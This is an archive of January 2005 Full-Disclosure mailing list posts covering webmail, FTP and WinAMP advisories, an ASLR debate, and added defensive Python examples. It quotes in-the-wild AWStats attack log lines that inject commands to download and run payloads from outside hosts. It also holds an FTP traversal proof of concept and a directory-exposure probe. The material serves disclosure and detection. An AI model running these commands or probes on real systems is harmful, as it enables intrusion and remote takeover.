
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html



 
Re: [Full-Disclosure] /usr/bin/trn local root exploit

From: ntx0f (ntx0f@seteuid.com)
Date: Thu Jan 27 2005 - 03:54:09 CST


I could be wrong, but on my system it's not a suid binary; how is this a
local root?


 
Re: [Full-Disclosure] /usr/bin/trn local root exploit

From: Wojciech Pawlikowski (wojtek@vline.pl)
Date: Thu Jan 27 2005 - 04:25:13 CST


On Thu, Jan 27, 2005 at 04:54:09AM -0500, ntx0f wrote:
> I could be wrong but on my system it's not a suid binary, how's this a
> local root?

Maybe by using some Jedi mind tricks? ;)

--
* Wojciech Pawlikowski :: <ducer at hard-core pl> :: NIC-HDL WP5161-RIPE *
* http://ducer.w00nf.org :: http://www.knockdownhc.com :: Born to Hate *


 
[Full-Disclosure] ITTS ADVISORY 01/05 - Uebimiau <= 2.7.2 Multiple Vulnerabilities

From: Martin Fallon (mar_fallon@yahoo.com.br)
Date: Thu Jan 27 2005 - 06:09:00 CST


ADVISORY 01 15/01/2005

INTRUDERS TIGER TEAM SECURITY - SECURITY ADVISORY

       http://www.intruders.com.br/
       http://www.intruders.org.br/

ADVISORY/0105 - UEBIMIAU < 2.7.2 MULTIPLE
VULNERABILITIES

PRIORITY: HIGH

I - INTRODUCTION:
----------------

From http://www.uebimiau.org/

"UebiMiau is a simple, yet efficient cross-platform
POP3/IMAP mail
reader written in PHP. It has many features,
such as: Folders,
View and Send Attachments, Preferences, Search, Quota
Limit, etc.
UebiMiau DOES NOT require a database or extra PHP
modules (--with-imap)"

II - DESCRIPTION:
------------------

Intruders Tiger Team Security has identified multiple
vulnerabilities in the Uebimiau WebMail Server in the default
installation that can be exploited by malicious users
to hijack session files and other information
on the target system.

Intruders Tiger Team Security has discovered that many
systems are vulnerable.

III - ANALYSIS
---------------

In the default installation, Uebimiau creates one
temporary folder to store "sessions" and other
files. This folder is defined in "inc/config.php"
as "./database/".

If the web administrator doesn't change this
folder, an attacker can exploit this using
the following request:

http://server-target/database/_sessions/

If the web server permits "directory listing",
the attacker can read the session files.

Another problem lies in the way that the files
of users are stored. In the default installation
the users' files are stored using
the following model:

$temporary_directory/<user>_<domain>/

An attacker can access a user's files by requesting:

http://server-target/database/user_domain/

where user is the target user and domain is
the target domain.

Intruders Tiger Team Security has found many
servers vulnerable to these attacks.

IV. DETECTION
-------------

Intruders Tiger Team Security has confirmed the
existence of this vulnerability in Uebimiau version 2.7.2.

Other versions are possibly vulnerable too.

V. WORKAROUND
--------------

STEP 1 - Insert an index.php in each directory of
Uebimiau.

STEP 2 - Set the variable $temporary_directory to a
directory that is not public and has restricted access;
set permissions as read-only for the "web server user"
on each file in $temporary_directory.

STEP 3 - Set open_basedir in httpd.conf for your
clients, following the model below:

<Directory /server-target/public_html>
php_admin_value open_basedir
/server-target/public_html
</Directory>

VI - VENDOR RESPONSE
--------------------

15/01/2005 - Flaw discovered.
18/01/2005 - Contacted Uebimiau Team.
20/01/2005 - Vendor response.
26/01/2005 - Advisory published.

VII - CREDITS
-------------

Glaudson Ocampos (Nash Leon) and Intruders Tiger Team
Security discovered this vulnerability.

Thanks to Wendel Guglielmetti Henrique (dum_dum) and
Waldemar Nehgme from securityopensource.org.br.

Visit the Intruders Tiger Team Security web site for
more advisories:

http://www.intruders.com.br/
http://www.intruders.org.br/
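An added example (editor's code, not part of the advisory above or of Uebimiau itself) that turns the two requests the advisory describes into a small probe: it checks the default "database/_sessions/" directory and a "<user>_<domain>" directory, and distinguishes an autoindex listing from a directory that merely answers 200 (for instance after a blank index.php was dropped in, which hides the listing but still leaves files fetchable by exact name). The HTTP layer is injected so the logic runs offline; "http://server-target" and the canned responses are constructed, not observed.

```python
"""Probe a Uebimiau installation for the exposed $temporary_directory.

Editor's example; not code from the Intruders advisory or from Uebimiau.
The fetch function is injected so the classification runs offline.
"""
import re
import urllib.error
import urllib.request
from typing import Callable, Dict, List, Tuple

# Default $temporary_directory from inc/config.php, as stated in the advisory.
DEFAULT_TMPDIR = "database"

Fetcher = Callable[[str], Tuple[int, str]]   # url -> (status, body)


def session_dir_url(base: str, tmpdir: str = DEFAULT_TMPDIR) -> str:
    return base.rstrip("/") + f"/{tmpdir}/_sessions/"


def user_dir_url(base: str, user: str, domain: str, tmpdir: str = DEFAULT_TMPDIR) -> str:
    # Per-user files live under $temporary_directory/<user>_<domain>/
    return base.rstrip("/") + f"/{tmpdir}/{user}_{domain}/"


def classify(status: int, body: str) -> str:
    """Map an HTTP response for a directory URL onto a finding.

    listing : autoindex page served; file names (hence session ids) readable
    served  : 200 without autoindex markup, e.g. a blank index.php in place;
              files can still be fetched by exact name, so the fix is partial
    denied  : 403, the directory exists but is not served
    absent  : anything else (404, redirect, connection failure, ...)
    """
    if status == 200:
        if re.search(r"<title>\s*Index of /", body, re.I) or "Parent Directory" in body:
            return "listing"
        return "served"
    if status == 403:
        return "denied"
    return "absent"


def probe(base: str, users: List[Tuple[str, str]], fetch: Fetcher) -> Dict[str, str]:
    """Classify the session directory and each (user, domain) directory."""
    targets = [session_dir_url(base)] + [user_dir_url(base, u, d) for u, d in users]
    return {url: classify(*fetch(url)) for url in targets}


def http_fetch(url: str, timeout: float = 10.0) -> Tuple[int, str]:
    """Real fetcher, for hosts you are authorised to test."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.status, resp.read(65536).decode("utf-8", "replace")
    except urllib.error.HTTPError as e:
        return e.code, ""
    except urllib.error.URLError:
        return 0, ""


if __name__ == "__main__":
    # Constructed responses standing in for a real server.
    canned = {
        "http://server-target/database/_sessions/":
            (200, "<html><head><title>Index of /database/_sessions/</title></head>..."),
        "http://server-target/database/user_domain/": (403, "Forbidden"),
    }
    results = probe("http://server-target", [("user", "domain")],
                    lambda u: canned.get(u, (404, "")))
    for url, finding in results.items():
        print(f"{finding:8} {url}")
```

Replace the lambda with http_fetch to run it against a real install; a "listing" result on either URL is the condition the advisory describes, and "served" means the STEP 1 workaround was applied without STEP 2.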

        
        
                


 
[Full-Disclosure] Re: Slackware security updates

From: Matteo Giannone (rebonzo@libero.it)
Date: Thu Jan 27 2005 - 09:28:59 CST


On the home page www.slackware.com, read the news:

/*
2004-11-27

Pat made a new entry in the ChangeLog giving us all some fresh news about his
health condition.

He also stated (Pat's GPG-signed message) that the security packages (patches)
from the GUS-BR group (GUS GPG KEY) are trusted.

EDITED on 2004-12-07
A mirror of the GUS-BR tree can be found on osuosl (ftp and http).
*/

There have been no official patches on the website since November 2004; you should
manually update your system...
Or trust someone else's packages...
Or track slackware-current...

Matteo Giannone



 
RE: [Full-Disclosure] Slackware Security updates

From: ALD, Aditya, Aditya Lalit Deshmukh (aditya.deshmukhonline.gateway.expertworks.net)
Date: Thu Jan 27 2005 - 03:12:13 CST


>I've seen linux distributions sometimes posting here on
>full-disclosure it's security updates.

Guys, I always wanted to bring this up: why do we have to send the updates to
this list? Why not make another list just for this, or anyone who wants the
security alerts could get them directly from the original source.... Maybe
this might save a lot of bandwidth.

-aditya



 
Re: [Full-Disclosure] Terminal Server vulnerabilities

From: Valdis.Kletnieks@vt.edu
Date: Thu Jan 27 2005 - 09:50:54 CST


On Thu, 27 Jan 2005 09:00:39 +0100, "Nicolas RUFF (lists)" said:

> But I would point out something much more important : there are many
> more local exploits than remote (on Windows just like any other OS).
>
> Local exploits : about 1-2 a month
> * POSIX - OS/2 subsystem exploitation
> * Debugging subsystem exploitation (DebPloit)
> * 16-bit subsystem exploitation (NTVDM)
> * Shatter Attacks
> * Etc.
>
> Remote exploits : about once a year
> * RPC/DCOM (blaster)
> * LSASS (sasser)
>
> Basically, if you are logged in as an unprivileged user on a Terminal
> Server, you can easily become SYSTEM. If this Terminal Server is also a
> Domain Controller, game over.

You forgot one important factor - the use of IE and Outlook for the fast
direct-to-customer delivery of local exploits. Which *also* results in
a Game Over....

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (GNU/Linux)
Comment: Exmh version 2.5 07/13/2001

iD8DBQFB+Q3ecC3lWbTT17ARAigkAJ9N5FyrzZ4qqBR4mEhi5QkB5mJgAQCgnv7d
YFpkOQI6xzGXh6LljcW4UBU=
=S8ka
-----END PGP SIGNATURE-----



 
RE: [lists] [Full-Disclosure] Terminal Server vulnerabilities

From: ALD, Aditya, Aditya Lalit Deshmukh (aditya.deshmukhonline.gateway.expertworks.net)
Date: Thu Jan 27 2005 - 03:02:01 CST


 

>Of course, one of the very first things you should do on a Windows box
>is rename the administrator account, so this kind of blind
>brute-forcing is not possible.

There are ways to find out the usernames that are admin; they begin with 500_
(do a Google search if you want).

Any script kiddie worth his salt will tell you this... So this one is off,
because renaming the admin account will only be security through obscurity, which is
not good for the internet...



 
Re: [lists] [Full-Disclosure] Terminal Server vulnerabilities

From: Jan Muenther (jan.muenther@nruns.com)
Date: Thu Jan 27 2005 - 10:18:14 CST


> There are ways to find out the usernames that are admin; they begin with 500_
> (do a Google search if you want).
>
> Any script kiddie worth his salt will tell you this... So this one is off,
> because renaming the admin account will only be security through obscurity, which is
> not good for the internet...

It's also only possible when you've got NetBIOS/CIFS open to the Internet,
which is something even worse on the Internet. Even though the SID/RID of the
administrator can be determined remotely under these conditions, I'd
still recommend the renaming of the account as a standard hardening procedure.

And fwiw, the fact that a security safeguard can be overcome is not a reason to
completely disregard it. With this argumentation, you could sell your firewalls.

Cheers, j.


 
[Full-Disclosure] Remotely exploitable file traversal vulnerability in SnugServer 3.0.0.40 FTP Service

From: muts@zahav.net.il
Date: Thu Jan 27 2005 - 09:37:41 CST


See Security, Research and Development
www.see-security.com
------------------------------------------------------

[-] Product Information

SnugServer - All your Software Servers in 1 Application.
Upload and download files to/from the Internet. Unique
firewall file system where your FTP files can be stored in a
data file to prevent internal network hacker attacks. Product
Homepage: http://www.snugserver.com/

[-] Vulnerability Description

A file traversal vulnerability has been discovered in
SnugServer 3.0.0.40 FTP Service, which allows access to the
server filesystem, outside of ftproot.

[-]PoC

root@Whoppix:/# ftp 192.168.1.154
Connected to 192.168.1.154.
220-
 Welcome FTP User. SnugServer is ready.
 Name (192.168.1.154:root): muts@default.com
331 Password required for muts@default.com.
Password:
230 See FTP Server
Remote system type is You.
ftp> ls
200 PORT Command Successful.
150 Opening ASCII mode data connection for directory listing.
 drw-rw-rw- 1 owner group 0 Jan 21 03:51 ..
 drw-rw-rw- 1 owner group 0 Jan 21 02:08 dir
226 Transfer Complete.
ftp> cd ...
200 PORT Command Successful.
ftp> ls
200 PORT Command Successful.
150 Opening ASCII mode data connection for directory listing.
drw-rw-rw- 1 owner group 0 Jan 21 03:51 ..
drw-rw-rw- 1 owner group 0 Jan 21 03:51 Cert
drw-rw-rw- 1 owner group 0 Jan 21 03:51 Logs
drw-rw-rw- 1 owner group 0 Jan 21 03:51 Requests
drw-rw-rw- 1 owner group 0 Jan 21 03:51 Scripts
drw-rw-rw- 1 owner group 0 Jan 21 03:51 Errors
drw-rw-rw- 1 owner group 0 Jan 21 03:51 Queue
drw-rw-rw- 1 owner group 0 Jan 21 03:51 www
drw-rw-rw- 1 owner group 0 Jan 21 03:51 Infected
drw-rw-rw- 1 owner group 0 Jan 21 03:51 Temp
drw-rw-rw- 1 owner group 0 Jan 21 03:51 Filtered
drw-rw-rw- 1 owner group 0 Jan 21 03:51 BaseData
-rw-rw-rw- 1 owner group 8421376 Jan 21 03:52 SNUG.FDB
drw-rw-rw- 1 owner group 0 Jan 21 03:51 ftp
-rw-rw-rw- 1 owner group 1861120 Jan 21 03:52 Snug.gbk
-rw-rw-rw- 1 owner group 32 Jan 21 03:52 yarrow.rnd
226 Transfer Complete.
ftp>
 
[-] Patch

The vendor has been notified, and an update is available at:
 
http://www.snugserver.com/download.php

[-] Credits

This vulnerability was discovered by muts
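An added example (editor's code, not SnugServer's and not part of the advisory) of the server-side check that the PoC above shows missing: a client path is mapped onto the filesystem only after it has been confined to the FTP root. The "cd ..." in the session suggests a server that rewrites ".." itself and passes other dot-only names through to the operating system; the function below refuses such components outright and then verifies, independently, that the resolved path still has the root as a prefix. The root "/srv/ftp" is an assumed value.

```python
"""Server-side path confinement for an FTP root.

Editor's example; not SnugServer code. Shows the two checks a server needs so
that '..', '...' or backslash variants cannot reach files outside ftproot.
"""
import posixpath


class PathEscape(ValueError):
    """Raised when a client path would resolve outside the FTP root."""


def resolve_ftp_path(ftproot: str, cwd: str, requested: str) -> str:
    """Map a client path (relative to the virtual cwd) onto the real filesystem,
    refusing anything that does not stay under ftproot.

    1. Reject dot-only components other than '.' and '..' ('...', '....');
       on Windows the OS may treat these as parent references even though a
       naive '..' filter lets them through.
    2. Normalise the virtual path (which can never climb above '/'), then
       verify the real path is ftproot or lies beneath it.
    """
    ftproot = posixpath.normpath(ftproot)
    # The FTP namespace uses '/', so fold Windows separators first.
    req = requested.replace("\\", "/")
    cwd = "/" + cwd.replace("\\", "/").lstrip("/")
    virtual = req if req.startswith("/") else posixpath.join(cwd, req)
    while virtual.startswith("//"):            # normpath would keep a leading '//'
        virtual = virtual[1:]
    for comp in virtual.split("/"):
        if comp and set(comp) == {"."} and comp not in (".", ".."):
            raise PathEscape(f"rejected dot-only component {comp!r} in {requested!r}")
    norm = posixpath.normpath(virtual)         # collapses '.', '..'; '/..' -> '/'
    real = posixpath.normpath(posixpath.join(ftproot, norm.lstrip("/")))
    if real != ftproot and not real.startswith(ftproot + "/"):
        raise PathEscape(f"{requested!r} resolves to {real!r}, outside {ftproot!r}")
    return real


if __name__ == "__main__":
    root = "/srv/ftp"   # assumed root for the demonstration
    for cwd, req in [("/", "dir"), ("/dir", ".."), ("/", "../../Logs"), ("/", "...")]:
        try:
            print(f"cd {req!r} from {cwd!r} -> {resolve_ftp_path(root, cwd, req)}")
        except PathEscape as e:
            print(f"cd {req!r} from {cwd!r} -> refused: {e}")
```

The second check is the one that matters: even if a new dot-variant slips past the first, the prefix comparison on the normalised real path still blocks it.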


 
[Full-Disclosure] Re: [ GLSA 200501-36 ] AWStats: Remote code execution

From: Niels Bakker (niels-bugtraq@bakker.net)
Date: Wed Jan 26 2005 - 19:44:49 CST


* krustev@krustev.net (Delian Krustev) [Thu 27 Jan 2005, 01:44 CET]:
> There's an exploit in the wild. Here's what it does:
>
> 200.96.166.252 - - [26/Jan/2005:06:32:00 +0000] "GET /cgi-bin/awstats/awstats.pl?configdir=|cd%20/tmp;wget%20http://www.nokiacentrum.cz/dcha0s/cgi;ls%20-la%20cgi;chmod%20777%20cgi;./cgi;%00 HTTP/1.1" 200 538 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
> 200.96.166.252 - - [26/Jan/2005:06:34:30 +0000] "GET /cgi-bin/awstats/awstats.pl?configdir=|cd%20/tmp;wget%20http://www.nokiacentrum.cz/dcha0s/dc;chmod%20777%20dc;./dc%20cyber.yar.ru%208080;%00 HTTP/1.1" 200 554 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

It's been out there for a while already:

208.53.170.6 - - [29/Dec/2004:12:20:43 +0100] "GET /cgi-bin/awstats.pl?year=2003&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20%0Ajrown.com/ssh.a;perl%20ssh.a;wget%20jrown.com/buy/bot.txt;perl%20bot.txt;rm%20-rf%20ssh.*;rm%20-rf%20bot*%3B%%0A20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%0A%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5%0AD%29.%2527 HTTP/1.1" 200 47768 "-" "LWP::Simple/5.800"

Those files don't exist there anymore.

        -- Niels.

--
(please reply to niels=bugtraq instead of niels-bugtraq - except for
 the gazillion autoresponders of course)
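An added example (editor's code, not from the GLSA or from either poster) that turns the three log lines quoted in this thread into detection logic: it parses Apache combined-log lines, repeatedly percent-decodes each awstats.pl parameter, and flags the "configdir=|..." pipe injection as well as the older "rush"/"highlight" variant, which is double-encoded and, in the logged copy above, had "%0A" line breaks wrapped into it by the mailer. The three attack lines are copied from the posts; the fourth, benign line is constructed.

```python
"""Flag AWStats command-injection attempts in Apache combined logs.

Editor's example; not code from the GLSA or from the thread's posters.
SAMPLE_LOG holds the three attack requests quoted in the thread plus one
constructed benign request.
"""
import re
from typing import List, Tuple
from urllib.parse import unquote

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+)[^"]*" (?P<status>\d{3})'
)
# Shell metacharacters and the download-and-run idiom seen in the wild.
SHELL_MARKERS = re.compile(r"[;|`]|\b(?:wget|curl|perl|chmod)\b|\bpassthru\b|\bsystem\s*\(")


def decode_all(value: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly (the 2004 payload double-encodes its quotes)
    and drop newlines: the %0A in the logged URL are line wraps the mailer
    inserted, and removing them restores the original request."""
    for _ in range(rounds):
        decoded = unquote(value).replace("\n", "").replace("\r", "")
        if decoded == value:
            break
        value = decoded
    return value


def query_params(url: str) -> List[Tuple[str, str]]:
    """Split the query string on '&' only, leaving values encoded for decode_all."""
    _, _, query = url.partition("?")
    return [tuple(part.partition("=")[::2]) for part in query.split("&") if part]


def suspicious_params(url: str) -> List[Tuple[str, str]]:
    """(name, decoded value) for parameters carrying shell payloads."""
    if not url.partition("?")[0].endswith("awstats.pl"):
        return []
    hits = []
    for name, raw in query_params(url):
        value = decode_all(raw)
        # configdir=|... is the open() pipe injection; anything else with
        # shell markers covers the 'rush'/'highlight' eval-style variant.
        if (name == "configdir" and value.lstrip().startswith("|")) or SHELL_MARKERS.search(value):
            hits.append((name, value))
    return hits


def scan(lines: List[str]) -> List[Tuple[str, str, str]]:
    """(client ip, parameter, first 60 decoded chars) for each hit."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for name, value in suspicious_params(m["url"]):
            findings.append((m["ip"], name, value[:60]))
    return findings


SAMPLE_LOG = [
    # quoted from the thread
    '200.96.166.252 - - [26/Jan/2005:06:32:00 +0000] "GET /cgi-bin/awstats/awstats.pl?configdir=|cd%20/tmp;wget%20http://www.nokiacentrum.cz/dcha0s/cgi;ls%20-la%20cgi;chmod%20777%20cgi;./cgi;%00 HTTP/1.1" 200 538 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"',
    '200.96.166.252 - - [26/Jan/2005:06:34:30 +0000] "GET /cgi-bin/awstats/awstats.pl?configdir=|cd%20/tmp;wget%20http://www.nokiacentrum.cz/dcha0s/dc;chmod%20777%20dc;./dc%20cyber.yar.ru%208080;%00 HTTP/1.1" 200 554 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"',
    '208.53.170.6 - - [29/Dec/2004:12:20:43 +0100] "GET /cgi-bin/awstats.pl?year=2003&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20%0Ajrown.com/ssh.a;perl%20ssh.a;wget%20jrown.com/buy/bot.txt;perl%20bot.txt;rm%20-rf%20ssh.*;rm%20-rf%20bot*%3B%%0A20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%0A%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5%0AD%29.%2527 HTTP/1.1" 200 47768 "-" "LWP::Simple/5.800"',
    # constructed benign request
    '198.51.100.7 - - [27/Jan/2005:09:00:00 +0000] "GET /cgi-bin/awstats.pl?config=example.com&year=2004 HTTP/1.1" 200 21000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, name, value in scan(SAMPLE_LOG):
        print(f"{ip:16} {name:10} {value}")
```

Decoding before matching is the point: the "highlight" value only reads as passthru($HTTP_GET_VARS[rush]) after two rounds, so a single-pass signature on the raw URL misses it.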


 
Re: [Full-Disclosure] Slackware Security updates

From: Rodrigo Barbosa (rodrigob@suespammers.org)
Date: Thu Jan 27 2005 - 10:41:59 CST


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Maybe you should contact the Slackware maintainer(s) regarding this.

FD has no control over slackware or any other distributions.

[]s

On Wed, Jan 26, 2005 at 02:57:00PM -0200, Carlos de Oliveira wrote:
> Hi there!
>
> I've seen Linux distributions sometimes posting their security updates here on
> full-disclosure.
> I have used Slackware Linux for some time, but I never gave much importance
> to Slackware updates, and I want to know why there are no Slackware
> update announcements here?
>
> Maybe Slackware is so powerful that it doesn't need patches? ehheehh
> Or, where can I get the Slack patches?
>
> Once again, sorry for my poor English; I am training.

- --
Rodrigo Barbosa <rodrigob@suespammers.org>
"Quid quid Latine dictum sit, altum viditur"
"Be excellent to each other ..." - Bill & Ted (Wyld Stallyns)

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.3 (GNU/Linux)

iD8DBQFB+RnXpdyWzQ5b5ckRAlaMAJ96KQRiWxgcR+IjuafKO9b5djy2CgCbBXEX
+lckv/IX8eUx9aOER8FmJa4=
=R2W9
-----END PGP SIGNATURE-----


 
[Full-Disclosure] "Advances in Security" in the Linux Kernel and RedHat idiocy

From: Brad Spengler (spender@grsecurity.net)
Date: Thu Jan 27 2005 - 10:10:43 CST


Just wanted to point out to you guys the INCREDIBLE advances in Linux
security underway on LKML from security expert Arjan van de Ven:

http://lkml.org/lkml/2005/1/27/62

On the subject of his i386-only mmap randomization patch:

The randomisation range is 1 megabyte (this is bigger than the stack
randomisation since the stack randomisation only needs 16 bytes alignment
while the mmap needs page alignment, a 64kb range would not have given
enough entropy to be effective)

If we do a little math..
1048576 / 4096 = 256
65536 / 16 = 4096

256 different locations for the mmap base, 4096 different locations for
the stack (and apparently argv/envp pages get no randomization)

Anyone with half a brain would see this is a joke, but not security
expert Arjan van de Ven:

http://lkml.org/lkml/2005/1/27/56

"full randomisation makes it not possible to use absolute addresses in
the exploit."

I guess anyone who thinks that taking a hardcoded exploit and running it
256 times would always result in a successful exploit is stupid.

In true non-hackery fashion, it has a sysctl entry that will disable
randomization entirely if for instance a single developer on the system
needs to debug a single application:

http://lkml.org/lkml/2005/1/27/57

But then someone complained that it should be more fine-grained, so now
if PT_GNU_STACK is disabled on the app, randomization will be turned off
as well. I guess that's RedHat's definition of it.

And remember kids, if you're owning Fedora or RHEL, you can bypass all
this "randomization" (the junk in Exec-shield isn't any better) for suid
apps by abusing a vuln in RedHat's glibc that leaks randomization info
via LD_DEBUG=files, LD_DEBUG=all or LD_TRACE_PRELINKING.
BTW, this remains unfixed since *AUGUST* of last year. Bugzilla reports
were filed, even an LWN article was posted about the problem:

http://lwn.net/Articles/99137/

3 months later, on December 7th, Jakub committed a "fix" to glibc that I
guess he never tested. The only change made was to add LD_DEBUG to
unsecvars.h. If he had bothered to listen to other people, or looked at
the fixes from other distros, he would have seen his "fix" wasn't
enough.

Yet now he's rejecting any bug reports on the subject, claiming he has
fixed the problem:

https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=146207

Yet I've just verified from two separate users of Fedora Core 3 that the
problem is indeed *NOT* fixed, verifying my analysis of elf/rtld.c that
it was not fixed.

Tilting the scale of security hype back to reality,
-Brad

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.5 (GNU/Linux)

iD8DBQFB+RKBmHm2SUJF1GoRAqL9AJ42rMyQYfS8gjG3s+DWRB015G7xvgCfamFt
n/URXna1RAY6tIrXa5WN744=
=K4Ic
-----END PGP SIGNATURE-----
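An added example (editor's code, not Brad's or Arjan's) that puts numbers on the brute-force argument above: for a range of R bytes at alignment A there are R/A equally likely base addresses, and an exploit hard-coded for one of them succeeds on a given run with probability A/R. The functions assume each run draws a fresh independent address and that a miss only crashes the target, which is the case for a service that respawns or a suid binary the attacker can re-execute.

```python
"""How far brute force gets against a given randomisation range.

Editor's example; not code from the LKML patches or from either poster.
Assumes independent, uniformly distributed base addresses per run.
"""
import math


def positions(range_bytes: int, alignment: int) -> int:
    """Distinct base addresses: the range divided by the alignment granule."""
    return range_bytes // alignment


def entropy_bits(range_bytes: int, alignment: int) -> float:
    return math.log2(positions(range_bytes, alignment))


def hit_probability(range_bytes: int, alignment: int, runs: int) -> float:
    """P(at least one of `runs` attempts lands on the hard-coded address)."""
    n = positions(range_bytes, alignment)
    return 1.0 - (1.0 - 1.0 / n) ** runs


def runs_for_confidence(range_bytes: int, alignment: int, confidence: float) -> int:
    """Smallest number of attempts for which hit_probability >= confidence."""
    n = positions(range_bytes, alignment)
    return math.ceil(math.log(1.0 - confidence) / math.log(1.0 - 1.0 / n))


if __name__ == "__main__":
    # The two ranges discussed in the thread.
    layouts = {
        "mmap base (1 MiB range, 4 KiB pages)": (1 << 20, 4096),
        "stack (64 KiB range, 16-byte alignment)": (1 << 16, 16),
    }
    for label, (rng, align) in layouts.items():
        print(f"{label}: {positions(rng, align)} positions, "
              f"{entropy_bits(rng, align):.0f} bits; "
              f"50% hit after {runs_for_confidence(rng, align, 0.5)} runs, "
              f"99% after {runs_for_confidence(rng, align, 0.99)} runs")
```

With 8 bits of mmap entropy a fixed-address exploit has better than even odds inside 178 runs and 99% inside about 1,177; the 12-bit stack range multiplies both figures by 16. That is what the "256 times" remark amounts to, and it is also why a leak of the chosen base (the LD_DEBUG issue mentioned above) matters more than the exact range size.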



 
[Full-Disclosure] Terminal services-additional help

From: Edward Beuerlein (ebeuerle@excite.com)
Date: Wed Jan 26 2005 - 16:16:42 CST


In addition,
You can install Cygwin (www.cygwin.com) with OpenSSH and tunnel Terminal Services through OpenSSH (very simple to do with PuTTY), and then use your router or firewall to block port 3389.
-Eddie B.

On Tue, 25 Jan 2005 14:38:30 -0600, Curt Purdy <purdy at tecman.com> wrote:

> The problem with terminal server is not any vulnerabilities that can be
> exploited, but the fact that administrator can be bruteforced (6 attempts
> followed by reconnect) and that it is screaming its existence on port 3889.
> If you use it, definitely change the port in the registry.

>>You can use the local security policy to prevent administrators from
>>logging in via terminal services and then enable "run as" for
>>administrative tasks...which should be done anyway. Changing the >>port
>>number is another good step though.
>>
>>--
>>Jonathan



 
[Full-Disclosure] NSFOCUS SA2005-01 : Buffer Overflow in WinAMP in_cdda.dll CDA Device Name

From: NSFOCUS Security Team (security@nsfocus.com)
Date: Thu Jan 27 2005 - 03:19:13 CST


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

NSFOCUS Security Advisory(SA2005-01)

Topic: Buffer Overflow in WinAMP in_cdda.dll CDA Device Name

Release Date: 2005-01-27

CVE CAN ID: CAN-2004-1150

http://www.nsfocus.com/english/homepage/research/0501.htm

Affected systems & software
===========================
Nullsoft WinAMP 5.0
Nullsoft WinAMP 5.01
Nullsoft WinAMP 5.02
Nullsoft WinAMP 5.03
Nullsoft WinAMP 5.04
Nullsoft WinAMP 5.05
Nullsoft WinAMP 5.06
Nullsoft WinAMP 5.07
Nullsoft WinAMP 5.08

Unaffected systems & software
=============================
Nullsoft WinAMP 2.X
Nullsoft WinAMP 5.08c

Summary
=========

WinAMP is a popular media player that supports various media and playlist
formats, including playlists in m3u or pls format.

NSFocus Security Team has found a buffer overflow vulnerability in the
plug-in with which WinAMP plays CDs. An attacker can construct a malicious playlist
file that is embedded in an HTML page. If a user is persuaded to click it,
then the attacker can gain complete control over the user's system.

Description
============

WinAMP implements various functionalities through different plug-ins that
are stored in the "plugins" sub-directory of the WinAMP installation directory. For
example, in_mp3.dll is used to play MP3 files and in_cdda.dll is used to
play CDs.

The in_cdda.dll of WinAMP supports play path requests in the following formats:

  1. <Driver\><PathName\>[FileName].cda
  2. linein://
  3. cda://
  4. cda://<Driver>
  5. cda://<Driver>,<TrackNumber>

Brett Moore of Security-Assessment.com discovered a stack overflow when in_cdda.dll
handles the first format. WinAMP released version 5.07 to fix that vulnerability.

However, in_cdda.dll will still overflow when handling the 4th and 5th
formats above. The stack overflow is triggered simply by appending an over-long device
name or track number after "cda://".

Any method that can pass a play path to WinAMP can be used to trigger this
vulnerability, for example the command line.

One possible remote attack vector is to construct a playlist file in m3u
or pls format with an over-long path and embed it in HTML. Once a user visits
such a malicious page, it will execute code of the attacker's choice.

Workaround
=============

NSFOCUS suggests removing in_cdda.dll from the Plugins directory of WinAMP.

Vendor Status
==============

2004.11.24 Informed the vendor support@winamp.com, no response
2004.12.06 Tests proved winamp 5.07 is affected, informed the vendor again
2004.12.07 The vendor confirmed the vulnerability
2004.12.25 Tests proved winamp 5.08 is affected, informed the vendor
2005.01.10 The vendor released winamp 5.08c to fix the vulnerability

The vendor has released winamp 5.08c to fix this vulnerability. The latest
version is available at http://www.winamp.com/player/

Additional Information
========================

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2004-1150 to this issue. This is a candidate for inclusion in the
CVE list (http://cve.mitre.org), which standardizes names for security problems.
Candidates may change significantly before they become official CVE entries.

Acknowledgment
===============

Yu Yang of NSFOCUS Security Team found the vulnerability.

DISCLAIMER
==========
THE INFORMATION PROVIDED IS RELEASED BY NSFOCUS "AS IS" WITHOUT WARRANTY
OF ANY KIND. NSFOCUS DISCLAIMS ALL WARRANTIES, EITHER EXPRESSED OR IMPLIED,
EXCEPT FOR THE WARRANTIES OF MERCHANTABILITY. IN NO EVENT SHALL NSFOCUS
BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT,
INCIDENTAL,CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES,
EVEN IF NSFOCUS HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
DISTRIBUTION OR REPRODUCTION OF THE INFORMATION IS PROVIDED THAT THE
ADVISORY IS NOT MODIFIED IN ANY WAY.

